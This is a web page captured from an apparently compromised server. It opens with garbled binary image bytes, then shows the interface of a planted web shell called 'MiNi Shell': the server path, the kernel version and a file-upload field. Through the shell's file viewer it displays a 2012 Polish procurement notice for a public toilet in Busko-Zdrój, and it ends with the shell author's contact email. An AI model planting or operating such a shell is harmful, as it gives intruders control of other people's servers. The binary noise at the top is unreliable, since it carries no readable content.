JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/99909-N-2012.html

<p class="kh_header"><b>Busko-Zdrój: Budowa toalety publicznej w Busku-Zdroju</b><br>
<b>Numer ogłoszenia: 99909 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa toalety publicznej w Busku-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 1 Przedmiotem zamówienia jest budowa toalety publicznej przy ul.Kopernika w Busku-Zdroju na działce o nr ewid. 206/2 , obr. ewid. 10 Busko-Zdrój. Toaleta stanowi budynek parterowy w konstrukcji szkieletu stalowego (ściany zewnętrzne oraz stropodach) wraz z niezbędnymi instalacjami wewnętrznymi. 
Powierzchnia użytkowa: 52,16m2; kubatura: 217,40m3.
                  
1.2. Zakres prac:
1)	budowa budynku toalety publicznej:
      - budynek parterowy z dachem płaskim,
      - podzielony na 3 części: damską, męską oraz socjalną,
      - konstrukcja: szkielet stalowy zaizolowany pianką poliuretanową, obłożony płytą OSB 		wodoodporną,
	- ławy fundamentowe oraz płyta na gruncie - żelbetowe, monolityczne, zaizolowane,  
	- wentylacja: grawitacyjna oraz mechaniczna,
	- ściany zewnętrzne wykończone płytkami typu gress elewacyjny z elementami szkła 		matowego, antywłamaniowego, bezpiecznego,
      - wewnętrzna powierzchnia ścian wykończona płytkami typu gress ścienny,
      - ścianki podziałowe pomiędzy poszczególnymi kabinami o wysokości 2,30m z 			prześwitem nad podłogą 0,15m, z płyt laminowanych wodoodpornych,
      - drzwi wejściowe: aluminiowe oszklone szkłem matowym oraz szklane z przylgami ze 		szkła bezpiecznego,
      - przegroda między częścią damską a męską oraz pomiędzy częścią sanitarną a socjalną - 		jako ściana pełna z cegły pełnej,
      - rynny i rury z blachy tytanowej,
      - posadzki: podłogi przemysłowe,
      - instalacje: ciepłej i zimnej wody, ściekowa, c.o., elektryczna, oświetlenia, odgromowa, 
      - wyposażenia: armatura sanitarna, gaśnice, meble do pomieszczenia socjalnego i części 		sanitarnej
2)	zagospodarowanie terenu:
	- wykonanie dojść i dojazdów do budynku z kostki brukowej na  podbudowie utwardzonej,
	- wykonanie trawników,
	- wycinka drzew i krzewów kolidujących z budynkiem toalety i utwardzeniami w jej 		rejonie
3)	demontaż istniejącego ogrodzenia (od strony ul.Kopernika):
 	- w celu zapewnienia dojścia i dojazdu na czas wykonywania robót

UWAGA!
    Przy doborze materiałów opisanych w dokumentacji technicznej, STWiOR i SIWZ należy posługiwać się parametrami technicznymi - Zamawiający dopuszcza zastosowanie produktu innego producenta o parametrach równoważnych lub nie gorszych niż przyjęto w  dokumentacji technicznej.


1.3. Szczegółowy zakres robót określają:
1)	projekt budowlano-wykonawczy - Projekt budowy publicznej toalety przy ul. Kopernika w Busku-Zdroju dz.nr 206/2, 206/1 -   branża archikektoniczno-konstrukcyjna- załącznik nr 11a,
2)	projekt budowlany i wykonawczy - Budowa toalety publicznej przy ul. Kopernika w Busku-Zdroju -  branża sanitarna - załącznik nr 11b,
3)	projekt budowlany - Toaleta publiczna -  branża elektryczna załącznik nr 11c
4)	przedmiary robót - załącznik nr 2 
5)	specyfikacje techniczne wykonania i odbioru robót  - załącznik nr 9 do SIWZ
6)	wzór umowy - załącznik nr 10 do SIWZ

1.4.   Do Wykonawcy będzie należało również urządzenie i zabezpieczenie  (na  jego koszt 	placu budowy, dostarczenie wody i energii do celów budowlanych,  uporządkowanie 	terenu budowy po zakończeniu robót oraz sporządzenie w 3  egzemplarzach:
a) dokumentacji technicznej powykonawczej 
b) inwentaryzacji geodezyjnej powykonawczej.

2. Warunki realizacji przedmiotu zamówienia:
1)  Zamawiający dopuszcza realizację zamówienia w systemie generalnego wykonawstwa.
2) Zamawiający zastrzega sobie prawo do zmiany (ograniczenia  lub rozszerzenia) zakresu   
     przedmiotu umowy.
3) Wykonawca przed złożeniem oferty cenowej oraz rozpoczęciem robót powinien dokładnie 
      zapoznać się z dokumentacją oraz dokonać oględzin terenu objętego  inwestycją, by w     
     razie stwierdzonych niejasności domagać się od Zamawiającego  pisemnych instrukcji 
     i objaśnień. 
4)  W szczególności Wykonawca jest zobowiązany do zapoznania się z :
- naturą i rodzajem gruntu,
- wymaganiami związanymi z obiektami sąsiadującymi,
- elementami uzbrojenia podziemnego i nadziemnego na terenie inwestycji 
i w jego sąsiedztwie,
- sposobem dojazdu, możliwością komunikacji i parkowania, 
- obowiązującymi przepisami administracyjnymi odnoszącymi się do bezpieczeństwa wokół terenu budowy,
- warunkami ochrony konserwatorskiej,
- warunkami ochrony środowiska.
5)  Wykonawca nie będzie mógł żądać dodatkowego wynagrodzenia z tytułu nieznajomości    
   terenu budowy; brak możliwości dojazdu, poboru wody oraz podłączeń dla potrzeb        
    zaplecza budowy itd. nie będą mogły stanowić wystarczającego powodu dla Wykonawcy 
    aby nie rozpocząć robót w wyznaczonym terminie.
 6)  W przypadku sprzeczności pomiędzy dokumentami przyjmuje się, że Wykonawca       
      wybrał spośród wszystkich możliwych, rozwiązanie najbardziej kosztowne i w związku z   
      tym może być ono od niego wymagane.
7)  Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do      
     prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym 
     w projekcie budowlanym, w specyfikacji technicznej wykonania i odbioru  robót, 
     przedmiarach oraz  niniejszej specyfikacji istotnych warunków  zamówienia (SIWZ).
8) Jakość dostarczonych na budowę materiałów, wyrobów i elementów musi być  zgodna z    
  wymaganiami normowymi, atestami, świadectwami dopuszczenia do stosowania i  
     wymaganiami zawartymi w SIWZ.
9) Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności Oferty,   
     która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko co może 
     być konieczne dla właściwego wykonania i wykończenia Robót oraz usunięcia usterek, 
     oprócz takich jakie wyraźnie zostały wyłączone Umową z zakresu zobowiązań   
    Wykonawcy.
10) Wykonawca jest zobowiązany do:
a)	utrzymywania w dobrym stanie dostępu do placu budowy (w tym dróg dojazdowych),
b)	informowania w odpowiednich terminach dysponentów sieci o zamierzonych robotach mających związek z w.w. sieciami,
c)	zabezpieczenie robót pod względem bhp,
d)	zabezpieczenia istniejącego drzewostanu i zieleni (nie przeznaczonego do usunięcia),
a w przypadku jego uszkodzenia - odtworzenie do stanu pierwotnego,
e)	wystąpienia w wymaganym terminie (zgodnie z załączonymi dokumentami) do dysponentów sieci z informacją/wnioskiem w sprawie prowadzenia robót (w tym ZEORK, PZD, MPGK, Karpacka Spółka Gazownictwa),
f)	zorganizowania i przeprowadzenia niezbędnych prób, badań i odbiorów wg polskich norm, obowiązujących warunków technicznych oraz wszelkich wytycznych zawartych w uzgodnieniach i decyzjach formalno-prawnych do projektu wraz 
z uzyskaniem do dnia podpisania protokołu końcowego odbioru robót, dokumentów potwierdzających pozytywne odbiory (w tym przez   MPGK, ZEORK, Karpacka Spółka Gazownictwa, UDT),
g)	utrzymywania na terenie budowy należytego porządku oraz zabezpieczanie zgromadzonych materiałów,
h)	przy wykonywaniu robót wykończeniowych - konsultacji z Zamawiającym przy wyborze materiałów oraz kolorystyki wykończenia,
i)	obsługi budynku w zakresie p.poż.: opracowania instrukcji bezpieczeństwa p.poż, oznakowania p.poż (m.in. drogi ewakuacyjne, przeciwpożarowe wyłączniki prądu, hydranty zewnętrzne i wewnętrzne), wyposażenie w niezbędny sprzęt p.poż.,
j)	po zakończeniu robót, a przed dniem odbioru robót przez Zamawiającego  -  usunięcia z terenu budowy wszelkich urządzeń tymczasowych, zaplecza itp. oraz uporządkowania miejsc wykonywania prac objętych zamówieniem. W przypadku uchylania się Wykonawcy od utrzymywania porządku na Placu  Budowy mimo wezwań ze strony Zamawiającego, Zamawiający zatrudni inną firmę do prac porządkowych na koszt i ryzyko Wykonawcy
11) W cenie zamówienia należy uwzględnić:
a)	koszty badań laboratoryjnych i odbiorów  technicznych,
b)	 koszty własne,
c)	 koszty zabezpieczenia placu budowy,
d)	koszty wynajmu i pracy sprzętu i mediów niezbędnych do funkcjonowania budowy,
e)	koszty opracowania dokumentacji powykonawczej, w tym inwentaryzacji geodezyjnej powykonawczej.
12) Wykonawca umieści przy wjeździe na teren budowy:
- tablicę informacyjną budowy
- oznakowanie zakazujące wstępu na teren budowy osobom nieupoważnionym oraz informacje o wyjeździe ciężarówek z budowy.
13)  W.w. elementy oraz czynności Wykonawca uwzględni w cenie zamówienia. 
14) Zapłata za wykonany przedmiot zamówienia nastąpi na podstawie poprawnie wystawionej 
   faktury końcowej złożonej na dziennik podawczy Zamawiającego. Integralnym załącznikiem
  faktury VAT będzie Protokół Odbioru Końcowego (uwzględniający obmiar robót 
  wykonanych), potwierdzony przez Kierownika Budowy, Inspektora Nadzoru  
     Inwestorskiego i  przedstawiciela UMIG.
15) Do dnia odbioru końcowego robót Wykonawca dostarczy Zamawiającemu   
       inwentaryzację geodezyjną powykonawczą wybudowanych obiektów  w  3 egz. 
       przyjętą do zasobów geodezyjnych Starostwa Powiatowego, dokumentację  
       powykonawczą w 2 egz. + 1 egz. rysunków ze zmianami dokonanymi w trakcie 	realizacji zadania, karty gwarancji, atesty, aprobaty itp. na wbudowane materiały, a 	także uporządkuje teren robót po  ich zakończeniu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1, 45.11.11.00-9, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 6 200,00 zł (słownie: sześć tysięcy dwieście złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
         co najmniej 2 zamówień dotyczących wykonania nowego obiektu kubaturowego     
         wraz z instalacjami wewnętrznymi o kubaturze min.200m3 , z podaniem ich: rodzaju, 
         wartości, daty  i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że           	roboty zostały wykonane zgodnie z  zasadami sztuki budowlanej oraz prawidłowo         	ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże że przy realizacji zamówienia będzie dysponował:
- 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej,
- 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w zakresie sieci i instalacji elektrycznych,
- 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w zakresie sieci i instalacji sanitarnych,
           wraz z oświadczeniami, że osoby ta posiadają wymagane przepisami uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 250 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć: 
1.	Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1.
2.	Ponieważ za wykonane zamówienie Wykonawca otrzyma wynagrodzenie ryczałtowe - Zamawiający nie wymaga aby do Oferty dołączyć kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano 	wyboru Wykonawcy, może nastąpić w przypadku: 
a)	 wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na 	podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności, których nie 	można było przewidzieć na etapie przygotowania inwestycji do realizacji,
b)	wprowadzenia rozwiązań zamiennych niezbędnych z punktu widzenia realizacji całości 	zamówienie, których nie można było wcześniej przewidzieć (np. ukryte wady projektowe 	ujawnione na etapie realizacji inwestycji, rozbieżności w stosunku do założeń 	projektowych) polegające np. na zamianie technologii wykonania danego elementu, jego 	parametrów, materiałów użytych do jego wykonania;
c)	wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadkach, gdy: 
a)	opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. siła wyższa (np.: klęska żywiołowa, niesprzyjające warunki atmosferyczne). Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności - do czasu ustąpienia tych okoliczności;
b)	wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do realizacji zadania (np.: zmieniające pozwolenie na budowę); 
c)	wystąpią niezależne od Wykonawcy opóźnienia w dostawach materiałów budowlanych i urządzeń, których nie można uzyskać od innych producentów (dostawców.);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com